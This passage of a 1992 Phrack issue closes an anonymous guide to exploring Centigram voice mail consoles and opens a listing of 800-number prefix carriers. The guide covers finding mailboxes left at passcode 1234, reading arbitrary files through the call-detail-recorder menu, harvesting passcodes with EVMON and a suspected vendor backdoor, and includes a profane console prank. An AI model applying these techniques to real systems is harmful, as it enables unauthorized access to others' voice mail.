/cmds/login to log the user in. Login was interrupted with ^Z and one of the shells, qnxsh, was called to handle input from the user. Finally, the typing of "tsk" requires that the /cmds/tsk program be given a task ID, and the output of the program is simply confirming that it exists. As mentioned, to kill a task from the shell, simply type "kill [task-id]" where [task-id] is the four digit hexadecimal number. There are other functions of the tsk program as well. The help screen lists: $ tsk ? use: tsk [f={cmoprst}] [p=program] [t=tty] [u=userid] tsk code [p=program] tsk info tsk mem t=tid tsk names tsk size [p=program] [t=tty] [u=userid] tsk ports tsk tsk tsk tree [+tid] [+all] [-net] tsk users [p=program] [t=tty] [u=userid] tsk vcs tsk who tid ... options: +qnx -header +physical [n=]node s=sort_field I haven't seen all the information available from this, yet, as the plain "tsk" tells me everything I need to know; however, you may want to play around: there's no telling what secrets are hidden... $ tsk tsk Tsk tsk? Have I been a bad computer? See what I mean? ddump: The ddump utility is used to display the contents on a specified blocks of the disk. It's quite simple to use. $ ddump ? use: ddump drive block_number [-v] Again, I'm not quite sure what the -v switch does, but the instructions are very straightforward. Normal output looks similar to: $ ddump 3 3 Place diskette in drive 3 and hit <-- this message is always displayed by ddump. Block 00000003 Status: 00 000: 00 00 00 00 00 00 00 00 94 00 00 00 00 00 00 00 ................ 010: 01 00 01 00 40 02 00 00 00 02 00 00 00 00 00 00 ....@........... 020: 00 01 00 FF FF 00 00 97 37 29 17 00 01 01 01 30 ........7).....0 030: C4 17 8E 62 69 74 6D 61 70 00 00 00 00 00 00 00 ...bitmap....... 040: 00 00 00 00 C0 00 00 00 00 00 00 00 00 00 00 00 ................ 050: 00 00 00 FF FF 00 00 A5 37 29 17 00 01 01 17 30 ........7).....0 060: C4 25 8E 6C 6C 6C 00 00 00 00 00 00 00 00 00 00 .%.lll.......... 070: 00 00 00 00 50 0E 00 00 00 0E 00 00 00 00 00 00 ....P........... 080: 00 01 00 FF FF 7E 05 A8 38 29 17 00 01 01 17 30 .....~..8).....0 090: C4 28 8F 61 62 63 00 00 00 00 00 00 00 00 00 00 .(.abc.......... 0A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ [...etc...] As you can probably notice, what we have here is the directory track for the ramdisk. It lists three files, even though the file abc no longer exists. The actual bytes have yet to be decoded, but, as far as the ramdisk goes, I suspect that they'll be memory related, and not physical block related; that is, I suspect that some of the numbers given above correspond to the memory address of the file, and not to the actual disk-block. So, at least for the ramdisk, finding specific files may be difficult. However, if you only have one file on the ramdisk besides "bitmap" (which appears to be mandatory across all the disks), then the next file you create should reside on track 4 and continue working its way up. Therefore, if you have evmon running and redirected to a file on the ramdisk, in order to check the contents, it's not necessary to kill the process and restart evmon, etc. Simply "ddump 3 4" and you could get either useless information (all the bytes are 00 or FF), or you could get something like: $ ddump 3 4 Place diskette in drive 3 and hit Block 00000004 Status: 00 000: 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 ................ 010: 6C 6E 20 20 32 36 20 74 74 20 33 1E 6C 6E 20 20 ln 26 tt 3.ln 020: 32 36 20 6C 69 6E 65 20 62 72 65 61 6B 1E 6C 6E 26 line break.ln 030: 20 20 32 36 20 6F 6E 68 6F 6F 6B 1E 6C 6E 20 20 26 onhook.ln 040: 32 38 20 72 69 6E 67 69 6E 67 1E 6C 6E 20 20 32 28 ringing.ln 2 050: 38 20 74 74 20 38 1E 6C 6E 20 20 32 38 20 74 74 8 tt 8.ln 28 tt 060: 20 37 1E 6C 6E 20 20 32 38 20 74 74 20 36 1E 6C 7.ln 28 tt 6.l 070: 6E 20 20 32 38 20 74 74 20 32 1E 6C 6E 20 20 32 n 28 tt 2.ln 2 080: 38 20 6F 66 66 68 6F 6F 6B 1E 6C 6E 20 20 32 38 8 offhook.ln 28 090: 20 74 74 20 2A 1E 6C 6E 20 20 32 38 20 74 74 20 tt *.ln 28 tt And so forth, thus making sure that the file does have some content. Depending upon the length of that content, you could then choose to either keep the file running, or restart evmon and buffer the previous output. led: The program "led" is Centigram's answer to a standard text editor. It is equivalent to "ed" in Unix or "edlin" in MS-DOS, but it does have its minor differences. "led" is used to create text files, edit existing log files, or edit executable shell scripts. By typing "led [filename]", you will enter the led editor, and if a filename is specified, and it exists, the file will be loaded and the editor set to line 1. If there is no filename on the command line, the file does not exist, or the file is busy, then led begins editing a null file, an empty buffer, without the corresponding filename. Commands can also be specified to be used in led after the filename is entered. If needed, you can experiment with this. Notable commands from within led: i insert a append w [filename] write to disk; if no file is named, attempt to write to current file; if there is no current file, do not write. d delete current line a number goto line numbered q quit (if not saved, inform user to use "qq") qq really quit When inserting or appending, led will prompt you with a "." period. To end your entry, simply enter one period alone on a line and you will then return to command mode. When displaying the current entry, led will prefix all new, updated lines, with the "i" character. The key sequence to enter a DobbsHead into a file and redirect it to the console, then, would be: $ led 3:/dobbshead 3:/dobbshead : unable to match file i . ___ . . / \ . . | o o | . . | Y | . U===== | . \___/ . FUCK YOU! q ?4 buffer has been modified, use qq to quit without saving w 3:/dobbshead 7 [the number of lines in the file] q $ p 3:/dobbshead > $cons $ rm 3:/dobbshead Ok, so it's not quite the DobbsHead. Fuck you. The console utility: The program that acts as the menu driver for the Voice Mail System Administration, the program that is normally run upon correct passcode entry, is /cmds/console. This program will simply produce a menu with a variety of sub-menus that allow the administrator to perform a wide assortment of tasks. Since this is mostly self-explanatory, I'll let you find out about these functions for yourself; I will, however, add just a few comments about the console utility. The first menu received should look like this: (c) All Software Copyright 1983, 1989 Centigram Corporation All Rights Reserved. MAIN MENU (M) Mailbox maintenance (R) Report generation (S) System maintenance (X) Exit Enter letter in () to execute command. When you need help later, type ?. COMMAND (M/R/S/X): The mailbox maintenance option is used when you want to find specific information concerning mailboxes on the system. For instance, to get a listing of all the mailboxes currently being used on the system: COMMAND (M/R/S/X): m MAILBOX MAINTENANCE (B) Mailbox block inquiry (C) Create new mailboxes (D) Delete mailboxes (E) Mailbox dump (I) Inquire about mailboxes (L) List maintenance (M) Modify mailboxes (P) Set passcode/tutorial (R) Rotational mailboxes (S) Search for mailboxes (X) Exit If you need help later, type ?. COMMAND (B/C/D/E/I/L/M/P/R/S/X): i Report destination (c/s1/s2) [c]: Mailbox to display: 0000-9999 >>> BOBTEL <<< Mailbox Data Inquiry Tue Mar 31, 1992 3:07 am Box Msgs Unp Urg Rec Mins FCOS LCOS GCOS NCOS MWI Passwd 8001 1 1 0 0 0.0 5 5 1 1 None Y 8002 0 0 0 0 0.0 5 5 1 1 None Y (t) 8003 0 0 0 0 0.0 12 12 1 1 None Y 8005 0 0 0 0 0.0 12 12 1 1 None Y 8006 6 6 0 0 0.7 12 12 1 1 None N 8008 0 0 0 0 0.0 5 5 1 1 None Y 8013 0 0 0 0 0.0 12 12 1 1 None 1234 8014 0 0 0 0 0.0 5 5 1 1 None Y 8016 0 0 0 0 0.0 12 12 1 1 None Y [ ... etc ... ] This simply lists every box along with the relevant information concerning that box. Msgs, Unp, Urg, Rec are the Total number of messages, number of unplayed messages, number of urgent messages, and number of received messages currently being stored on the drive for the mailbox; Mins is the numbers of minutes currently being used by those messages; F, L, G, and NCOS are various classes of service for the mailboxes; MWI is the message waiting indicator, or service light; and Passwd is simply a Yes/No condition informing the administrator whether the mailbox currently has a password. The "(t)" in the password field means the box is currently in tutorial mode, and the "1234" that replaces the Y/N condition, which means the box is set to initial tutorial mode with simple passcode 1234 -- in other words the box is available to be used by a new subscriber. Mailboxes with FCOS of 1 should be looked for: these represent administration or service mailboxes, although they are not necessarily capable of performing system administration functions. The System Maintenance option from the main menu is very useful in that, if you don't have access to the qnxsh, you can still run a number of tasks or print out any file you wish from within the menu system. The System Maintenance menu looks like: SYSTEM MAINTENANCE (A) Automatic Wakeup (B) Automated Receptionist Extensions (D) Display modem passcode (E) Enable modem/serial port (F) Floppy backup (G) Resynchronize HIS PMS room status (H) Hard Disk Utilities (L) Lights test (M) Manual message purge (N) System name (P) Passcode (R) Reconfiguration (S) System shutdown (T) Time and date (U) Utility menu (V) Call Detail Recorder (W) Network menu (X) Exit Enter letter in () to execute command. When you need help later, type ?. COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): If you don't have access to the "p" command, you can still display any specific file on the drive that you wish to see. Choose "v," the Call Detail Recorder option from above, and you will get this menu: COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): v Warning: cdr is not running. CALL DETAIL RECORDER MENU (C) Configure CDR (R) Run CDR (T) Terminate CDR (E) Run EVMON (F) Terminate EVMON (S) Show CDR log file (D) Delete CDR log file (X) Exit If you need help later, type ?. COMMAND (C/R/T/E/F/S/D/X): From here, you can use (C) Configure CDR to set the log file to any name that you want, and use (S) to print that file to your terminal. COMMAND (C/R/T/E/F/S/D/X): c Answer the following question to configure call detail recorder [ simply hit return until the last "filename" question come up ] VoiceMemo line numbers enabled: HOST 1 lines: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 VoiceMemo line numbers: EVMON: HOST 1 lines to monitor: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 EVMON:VoiceMemo line numbers: Message levels are: 1: Detailed VoiceMemo 2: VoiceMemo 3: Pager 4: Receptionist 5: EVMON 6: Automatic WakeUp 7: Open Account Administrator 8: DTMF to PBX 9: Message Waiting Lamp 10: SL-1 integration 11: Centrex Integration Message levels enabled: 2 3 7 9 Message levels: cdr enable = [N] Enter filename to save log data = [/logfile] /config/remote.cmds Returning from the CDR configuration. CALL DETAIL RECORDER MENU (C) Configure CDR (R) Run CDR (T) Terminate CDR (E) Run EVMON (F) Terminate EVMON (S) Show CDR log file (D) Delete CDR log file (X) Exit If you need help later, type ?. COMMAND (C/R/T/E/F/S/D/X): s ad cd copy date dskchk evmon files ls mount p pwd query task tcap what Don't forget to return the filename back to its original name as shown in the [] field after you have finished. If you don't have access to the shell, you can also run EVMON, from the CDR menu, using option E. It will simply start the evmon process displaying to your terminal, interruptable by the break character, ^C. This, unfortunately, cannot be redirected or run in the background as tasks running from the shell can. If, however, you have some time to kill, you may want to play with it. Also, from the System Maintenance menu, you can perform a number of shell tasks without direct access to the shell. Option (U), Utilities Menu, has an option called Task. This will allow you limited shell access, possibly with redirection and "&" back-grounding. COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): U UTILITY MENU (B) Reboot (H) History (T) Task (X) Exit Enter letter in () to execute command. When you need help later, type ?. COMMAND (B/H/T/X): t Choose the following commands: ad cd copy date dskchk evmon files ls mount p pwd query task tcap what Enter a command name or "X" to exit: pwd 1:/ Choose the following commands: ad cd copy date dskchk evmon files ls mount p pwd query task tcap what Enter a command name or "X" to exit: evmon Type Ctrl-C to terminate. ln 29 ringing ln 29 tt 8 ln 29 tt 0 ln 29 tt 8 ln 29 tt 6 ln 29 offhook ln 29 record ended [ ... etc ... ] A look at "ad": The program "ad" is called to dump information on a variety of things, the most useful being mailboxes. Dumps of specific information about a mailbox can be done either in Mailbox format, or Raw Dump format. Mailbox format looks like: $ ad Type #: 0 Mailbox #: 8486 (M)ailbox, (D)ump ? m MAILBOX: 8486 Login status: Bad logs = 3 Last log = 03/26/92 12:19 pmVersion = 0 Configuration: Name # = 207314 Greeting = 207309 Greeting2 = 0 Passcode = XXXXXXXXXX Tutorial = N Extension = 8486 Ext index = 0 Attendant = Attend index = 0 Code = ID = BOBTECH Day_treat = M Night_treat = M Fcos = 12 Lcos = 12 Gcos = 1 Ncos = 1 Rot index = 0 Rot period = 0 Rot start = -- wkup defined = N wkup freq = 0 wkup_intvl = 0 wkup index = 0 wkup number = Contents: Motd_seq = 8 Motd_played = N User_msgs = 0 Caller_msgs = 4 Sent_cpx_msgs= 0 Sent_fdx_msgs= 0 Sent_urg_msgs= 0 Tas_msgs = 0 Pages = 0 Receipt = 0 Sent_to_node = 0 Urg_to_node = 0 Net_urg_mlen = 0 Net_msgs_rcv = 0 Net_urg_rcv = 0 Net_sent_node= 0 Net_send_nurg= 0 Net_send_rcp = 0 Greet_count = 9 Successlogins= 1 Recpt_calls = 0 Recpt_complt = 0 Recpt_busy = 0 Recpt_rna = 0 Recpt_msgs = 0 Recpt_attend = 0 User_connect = 20 Clr_connect = 22 Callp_connect= 0 Disk_use = 498 Net_sent_mlen= 0 Net_rcvd_mlen= 0 Net_rcvd_urg = 0 Net_node_mlen= 0 Net_recip_mlen=0 Net_node_urg = 0 Text_msg_cnt = 0 Message Queues: TYPE COUNT TOTAL HEAD TAIL TYPE COUNT TOTAL HEAD TAIL Free 71 --- 58 55 Unplayed 0 --- -1 -1 Played 2 0.5 56 57 Urgent 0 --- -1 -1 Receipts 0 --- -1 -1 Undelivered 0 --- -1 -1 Future delivery 0 --- -1 -1 Call placement 0 --- -1 -1 Messages: 2 # msg # DATE TIME LENGTH SENDER PORT FLAGS MSG SIBL (MINS) NXT PRV NXT PRV Played Queue 56 207126 03/26/92 12:17 pm 0.5 000000000000000 27 ------P- 57 -1 -1 -1 57 207147 03/26/92 12:19 pm 0.1 000000000000000 29 ------P- -1 56 -1 -1 The Raw Dump format looks like: $ ad Type #: 0 Mailbox #: 8487 (M)ailbox, (D)ump ? d HEX: 8487 000: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 020: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 34 38 |..............48| 030: 37 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |7...............| 040: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 050: 00 00 00 00 00 00 00 00 - 00 00 42 49 4f 54 45 43 |..........BOBTEC| 060: 48 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |H...............| 070: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 080: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 37 32 33 |.............723| 090: 36 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |6...............| 0a0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 0b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 0c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| [mostly deleted -- the list continues to hex fff.] One of the unfortunate aspects is that the password is not displayed in the Mailbox format (Awwww!). I can tell you now, though, that it also isn't displayed anywhere in the Raw Dump format. The program "asetpass" was used to change the password of a test mailbox, and both full dumps were downloaded and compared; they matched exactly. So, it looks like the passcodes are probably stored somewhere else, and the dump simply contains a link to the appropriate offset; which means the only way, so far, to get passcodes for mailboxes is to capture them in EVMON. Intricacies of the login program: The console login program is 1:/cmds/login. Although I can't even recognize any valid 8080 series assembly in the program (and I'm told the Centigram boxes run on the 8080 family), I did manage to find a few interesting tidbits inside of it. First, the console and remote passwords seems to be stored in the file /config/rates; unfortunately, it's encrypted and I'm not going to try to break the scheme. /config/rates looks like this: $ p /config/rates \CE\FFC~C~\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00 \00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\00\00\00\00\00\00\00 \00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00 Accepting the \CE as some sort of control byte, this file is divided up into about eight empty sections of five bytes a piece, mostly null, indicating that, possibly, there are a number of acceptable passcode combinations, or a number of different functions with different passcodes. In this instance, only one passcode appears to be selected. I am still unsure, however, whether this is actually a password file, or a file that would act as a pointer to another space on the disk which contains the actual password. I would assume, for this login program, that it is actually an encrypted password. Another very interesting thing sleeping within the confines of the login program is the inconspicuous string "QNX." It sits in the code between two "Enter Passcode:" prompts, separated by \00s. I believe this to be a system wide backdoor placed into the login program by Centigram, Corp. Such a thing does exist; whenever Centigram wants to get into a certain mailbox system to perform maintenance or solve a problem, they can. They may, however, require the serial number of the machine or of the hard drive, in order to get this access. This serial number would be provided by the company requiring service. When logging in with QNX, a very strange thing happens. (^Z) Enter Passcode: (QNX^M) Enter Passcode: A second passcode prompt appears, a prompt in which the "QNX" passcode produces an Invalid Passcode message. I believe that when Centigram logs in from remote, they use this procedure, along with either a predetermined passcode, or a passcode determined based on a serial number, to access the system. I have not ever seen this procedure actually done, but it is the best speculation that I can give. I should also make note of a somewhat less important point. Should the console have no passcodes assigned, a simple ^Z for terminal activation will start the /cmds/console program, and log the user directly in without prompting for a passcode. The odds on finding a Centigram like this, nowadays, is probably as remote as being struck by lightning, but personally, I can recall a time a number of years back when a Florida company hadn't yet passcode protected a Centigram. It was very fun to have such a large number of people communicating back and forth in normal voice; it was even more fun to hop on conferences with a number of people and record the stupidity of the average Bell operator. Special Keys or Strings: There are a number of special characters or strings that are important to either the shell or the program being executed. Some of these are: ? after the program name, gives help list for that program. & runs a task in the background : sets the comment field (for text within shell scripts) ; command delimiter within the shell > redirects output of a task to a file < (theoretically) routes input from a file $cons the "filename" of the console (redirectable) $tty# the "filename" of tty number "#" $mdm the "filename" of the modem line #$ ? produces a value like "1920", "321d" probably the TID of the current process ## ? produces a value like "ffff" #% ? produces a value like "0020", "001d" #& ? produces a value like "0000" #? ? produces a value like "0000" #* a null argument #g ? produces a value like "00ff" #i directly followed by a number, produces "0000" not followed, produces the error "non-existent integer variable" probably used in conjunction with environment variables #k accepts a line from current input (stdin) to be substituted on the command line #m ? "00ff" #n ? "0000" #p ? "0042" #s produces the error "non-existent string variable" probably used in conjunction with environment variables #t ? "0003" #u ? some string similar to "system" #D ? "0018" #M ? "0004" #Y ? "005c" "Centigram Voice Mail System Consoles" was written anonymously. There are no group affiliations tied to this file. _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 7 of 13 /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ Special Area Codes II /^\ /^\ /^\ /^\ by Bill Huttig /^\ /^\ wah@ZACH.FIT.EDU /^\ /^\ /^\ /^\ February 24, 1992 /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ The first "Special Area Codes" file appeared in Phrack Issue 24, but here is an updated listing of the prefixes used with 800 toll free service. This list shows which carrier handles calls placed to 800-XXX numbers. Choice of carrier routing on calls to 800-xxx numbers cannot be overridden with 10xxx routing. It should also be noted that on calls to 800 numbers, the called party either immediatly in some instances or on a delayed basis receives a record of numbers which called. This identification of the calling party cannot be overridden with *67 or the "line-blocking" associated with Caller-ID. 202 RCCP RADIO COMMON CARRIER PAGING 212 RCCP RADIO COMMON CARRIER PAGING 213 9348 CINCINNATI BELL TELEPHONE 220 ATZ ATX-COMMUNICATIONS 221 ATX AT&T-C 222 ATX AT&T-C 223 ATX AT&T-C 224 LDL LONG DISTANCE FOR LESS 225 ATX AT&T-C 226 ATL ATC 227 ATX AT&T-C 228 ATX AT&T-C 229 TDX CABLE & WIRELESS COMMUNICATIONS 230 NTK NETWORK TELEMANAGEMENT SERVICES 231 ATX AT&T-C 232 ATX AT&T-C 233 ATX AT&T-C 234 MCI MCI TELECOMMUNICATIONS CORPORATION 235 ATX AT&T-C 236 SCH SCHNEIDER COMMUNICATIONS 237 ATX AT&T-C 238 ATX AT&T-C 239 DLT DELTA COMMUNICATIONS, INC. 240 SIR SOUTHERN INTEREXCHANGE SERVICES 241 ATX AT&T-C 242 ATX AT&T-C 243 ATX AT&T-C 244 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 245 ATX AT&T-C 246 9553 SOUTHWESTERN BELL 247 ATX AT&T-C 248 ATX AT&T-C 249 LWC LASSMAN-WEBER COMMUNICATIONS 251 ATX AT&T-C 252 ATX AT&T-C 253 ATX AT&T-C 254 TTU TOTAL-TEL USA 255 ATX AT&T-C 256 LSI LONG DISTANCE SAVERS 257 ATX AT&T-C 258 ATX AT&T-C 259 LSI LONG DISTANCE SAVERS 260 COK COM-LINK21 261 SCH SCHNEIDER COMMUNICATIONS 262 ATX AT&T-C 263 CAN TELCOM CANADA 264 LDD LDDS COMMUNICATIONS 265 CAN TELCOM CANADA 266 CSY COM SYSTEMS 267 CAN TELCOM CANADA 268 CAN TELCOM CANADA 269 FDG FIRST DIGITAL NETWORK 270 CRZ CLEARTEL COMMUNICATIONS 271 TRA3 TRAFFIC ROUTING ADMINISTRATION 3 272 ATX AT&T-C 273 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 274 MCI MCI TELECOMMUNICATIONS CORPORATION 275 ITT MTD/UNITED STATES TRANSMISSION SYSTEMS 276 ONE ONE CALL COMMUNICATIONS, INC. 277 SNT MCI / TDD / SOUTHERNNET, INC. 279 MAL MIDAMERICAN 280 ADG ADVANTAGE NETWORK, INC. 282 ATX AT&T-C 283 MCI MCI TELECOMMUNICATIONS CORPORATION 284 MCI MCI TELECOMMUNICATIONS CORPORATION 286 9147 SOUTHERN NEW ENGLAND TELEPHONE 287 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 288 MCI MCI TELECOMMUNICATIONS CORPORATION 289 MCI MCI TELECOMMUNICATIONS CORPORATION 292 ATX AT&T-C 293 PRO PROTO-COL 294 FDC AFFORD A CALL 295 ACT ACC LONG DISTANCE CORPORATION 296 LDW LONG DISTANCE SERVICE, INC. 297 ARE AMERICAN EXPRESS TRS 298 CNO COMTEL OF NEW ORLEANS 299 ATL ATC 302 RCCP RADIO COMMON CARRIER PAGING 312 RCCP RADIO COMMON CARRIER PAGING 320 CQD CONQUEST LONG DISTANCE CORPORATION 321 ATX AT&T-C 322 ATX AT&T-C 323 ATX AT&T-C 324 HNI HOUSTON NETWORKM INC./VXVY TELECOM, INC. 325 ATX AT&T-C 326 UTC US TELCOM, INC./US SPRINT 327 ATX AT&T-C 328 ATX AT&T-C 329 ATL ATC 330 ATL ATC 331 ATX AT&T-C 332 ATX AT&T-C 333 MCI MCI TELECOMMUNICATIONS CORPORATION 334 ATX AT&T-C 335 SCH SCHNEIDER COMMUNICATIONS 336 ATX AT&T-C 337 FDR FIRST DATA RESOURCES 338 ATX AT&T-C 339 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 340 FFM FIRST FINANCIAL MANAGEMENT CORPORATION 341 ATX AT&T-C 342 ATX AT&T-C 343 ATX AT&T-C 344 ATX AT&T-C 345 ATX AT&T-C 346 ATX AT&T-C 347 UTC US TELCOM, INC./US SPRINT 348 ATX AT&T-C 349 DCT DIRECT COMMUNICATIONS, INC. 350 CSY COM SYSTEMS 351 ATX AT&T-C 352 ATX AT&T-C 353 SCH SCHNEIDER COMMUNICATIONS 354 ATX AT&T-C 355 ATZ ATX-COMMUNICATIONS 356 ATX AT&T-C 357 CNZ CAM-NET SYSTEMS-INC. 358 ATX AT&T-C 359 UTC US TELCOM, INC./US SPRINT 360 CWV ? 361 CAN TELCOM CANADA 362 ATX AT&T-C 363 CAN TELCOM CANADA 364 HNI HOUSTON NETWORKM INC./VXVY TELECOM, INC. 365 MCI MCI TELECOMMUNICATIONS CORPORATION 366 UTC US TELCOM, INC./US SPRINT 367 ATX AT&T-C 368 ATX AT&T-C 369 TDD MCI / TELECONNECT 370 TDD MCI / TELECONNECT 372 ATX AT&T-C 373 TDD MCI / TELECONNECT 374 ITG INTERNATIONAL TELECHARGE, INC. 375 TNO ATC CIGNAL COMMUNICATIONS 375 ATL ATC 376 ECR ECONO-CALL LONG DISTANCE 377 GTS TELENET COMMUNICATIONS CORPORATION 378 NTP NATIONAL TELEPHONE COMPANY 379 EMI EASTERN MICROWAVE 381 LMI LONG DISTANCE OF MICHIGAN 382 ATX AT&T-C 383 TDD MCI / TELECONNECT 384 FDT FRIEND TECHNOLOGIES 385 CAB HEDGES COMMUNICATIONS /COM CABLE LAYING 386 TBQ TELECABLE CORPORATION 387 CAN TELCOM CANADA 388 MCI MCI TELECOMMUNICATIONS CORPORATION 390 EBR ECONO-CALL 392 ATX AT&T-C 393 EXF PIONEER TELEPHONE /EXECULINES OF FLORIDA 394 TDX CABLE & WIRELESS COMMUNICATIONS 395 MCI MCI TELECOMMUNICATIONS CORPORATION 396 BOA BANK OF AMERICA 397 TDD MCI / TELECONNECT 399 ARZ AMERICALL CORPORATION (CA) 402 RCCP RADIO COMMON CARRIER PAGING 412 RCCP RADIO COMMON CARRIER PAGING 420 TGR TMC OF SOUTHWEST FLORIDA 421 ATX AT&T-C 422 ATX AT&T-C 423 ATX AT&T-C 424 ATX AT&T-C 425 TTH TELE TECH, INC. 426 ATX AT&T-C 427 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 428 ATX AT&T-C 429 TRF T-TEL 431 ATX AT&T-C 432 ATX AT&T-C 433 ATX AT&T-C 434 AGN AMERIGON 435 ATX AT&T-C 436 IDN INDIANA SWITCH, INC. 437 ATX AT&T-C 438 ATX AT&T-C 439 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 440 TXN TEX-NET 441 ATX AT&T-C 442 ATX AT&T-C 443 ATX AT&T-C 444 MCI MCI TELECOMMUNICATIONS CORPORATION 445 ATX AT&T-C 446 ATX AT&T-C 447 ATX AT&T-C 448 ATX AT&T-C 449 UTD UNITED TELCO / TELAMAR 450 USL US LINK LONG DISTANCE 451 ATX AT&T-C 452 ATX AT&T-C 453 ATX AT&T-C 454 ALN ALLNET COMMUNICATIONS SERVICES 455 LDG LDD, INC. 456 MCI MCI TELECOMMUNICATIONS CORPORATION 457 ATX AT&T-C 458 ATX AT&T-C 459 9631 NORTHWEST BELL 460 NTX NATIONAL TELEPHONE EXCHANGE 461 CAN TELCOM CANADA 462 ATX AT&T-C 463 CAN TELCOM CANADA 464 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 465 CAN TELCOM CANADA 466 ALN ALLNET COMMUNICATIONS SERVICES 467 LDD LDDS COMMUNICATIONS 468 ATX AT&T-C 469 IAS IOWA NETWORK SERVICES 471 ALN ALLNET COMMUNICATIONS SERVICES 472 ATX AT&T-C 473 UTC US TELCOM, INC./US SPRINT 474 32V1 VIRGIN ISLAND TELEPHONE 475 TDD MCI / TELECONNECT 476 SNT MCI / TDD / SOUTHERNNET, INC. 477 MCI MCI TELECOMMUNICATIONS CORPORATION 478 AAM ALASCOM 479 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 481 1186 GTE/NORTH 482 ATX AT&T-C 483 0328 GTE/FLORIDA 484 TDD MCI / TELECONNECT 485 TDD MCI / TELECONNECT 486 TDX CABLE & WIRELESS COMMUNICATIONS 487 UTC US TELCOM, INC./US SPRINT 488 UTC US TELCOM, INC./US SPRINT 489 LDD LDDS COMMUNICATIONS 492 ATX AT&T-C 493 IPC INTERNATION PACIFIC 494 NWR NETWORK TELEPHONE SERVICE 495 JNT J-NET COMMUNICATIONS 496 TRA3 TRAFFIC ROUTING ADMINISTRATION 3 502 RCCP RADIO COMMON CARRIER PAGING 512 RCCP RADIO COMMON CARRIER PAGING 520 PCD PENTAGON COMPUTER DATA, LTD. 521 ATX AT&T-C 522 ATX AT&T-C 523 ATX AT&T-C 524 ATX AT&T-C 525 ATX AT&T-C 526 ATX AT&T-C 527 ATX AT&T-C 528 ATX AT&T-C 529 MIT MIDCO COMMUNICATIONS 530 VRT VARTEC NATIONAL, INC. 531 ATX AT&T-C 532 ATX AT&T-C 533 ATX AT&T-C 534 TRA3 TRAFFIC ROUTING ADMINISTRATION 3 535 ATX AT&T-C 536 ALN ALLNET COMMUNICATIONS SERVICES 537 ATX AT&T-C 538 ATX AT&T-C 539 FNE FIRST PHONE 540 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 541 ATX AT&T-C 542 ATX AT&T-C 543 ATX AT&T-C 544 ATX AT&T-C 545 ATX AT&T-C 546 UTC US TELCOM, INC./US SPRINT 547 ATX AT&T-C 548 ATX AT&T-C 549 CBU CALL AMERICA 550 CMA CALL-AMERICA 551 ATX AT&T-C 552 ATX AT&T-C 553 ATX AT&T-C 554 ATX AT&T-C 555 ATX AT&T-C 556 ATX AT&T-C 557 ALN ALLNET COMMUNICATIONS SERVICES 558 ATX AT&T-C 561 CAN TELCOM CANADA 562 ATX AT&T-C 563 CAN TELCOM CANADA 564 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 565 CAN TELCOM CANADA 566 ALN ALLNET COMMUNICATIONS SERVICES 567 CAN TELCOM CANADA 568 MCI MCI TELECOMMUNICATIONS CORPORATION 569 TEN TELESPHERE NETWORK 572 ATX AT&T-C 574 AMM ACCESS LONG DISTANCE 575 AOI UNITED COMMUNICATIONS, INC. 577 GTS TELENET COMMUNICATIONS CORPORATION 579 LNS LINTEL SYSTEMS 580 WES WESTEL 582 ATX AT&T-C 583 TDD MCI / TELECONNECT 584 TDD MCI / TELECONNECT 586 ATC ACTION TELECOM COMPANY 587 LTQ LONG DISTANCE FOR LESS 588 ATC ACTION TELECOM COMPANY 589 LGT LITEL 592 ATX AT&T-C 593 TDD MCI / TELECONNECT 594 TDD MCI / TELECONNECT 595 32P1 PUERTO RICO TELEPHONE 596 TOI TELECOM "OPTIONS" PLUS, INC. 599 LDM LONG DISTANCE MANAGEMENT 602 RCCP RADIO COMMON CARRIER PAGING 612 RCCP RADIO COMMON CARRIER PAGING 621 ATX AT&T-C 622 ATX AT&T-C 623 TRA3 TRAFFIC ROUTING ADMINISTRATION 3 624 ATX AT&T-C 625 NLD NATIONAL DATA CORP 626 ATX AT&T-C 627 MCI MCI TELECOMMUNICATIONS CORPORATION 628 ATX AT&T-C 629 2284 BEEHIVE TELEPHONE 631 ATX AT&T-C 